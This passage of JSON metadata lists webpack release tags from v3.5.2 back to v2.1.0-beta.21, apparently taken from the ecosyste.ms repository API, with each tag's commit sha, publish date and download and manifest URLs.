3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/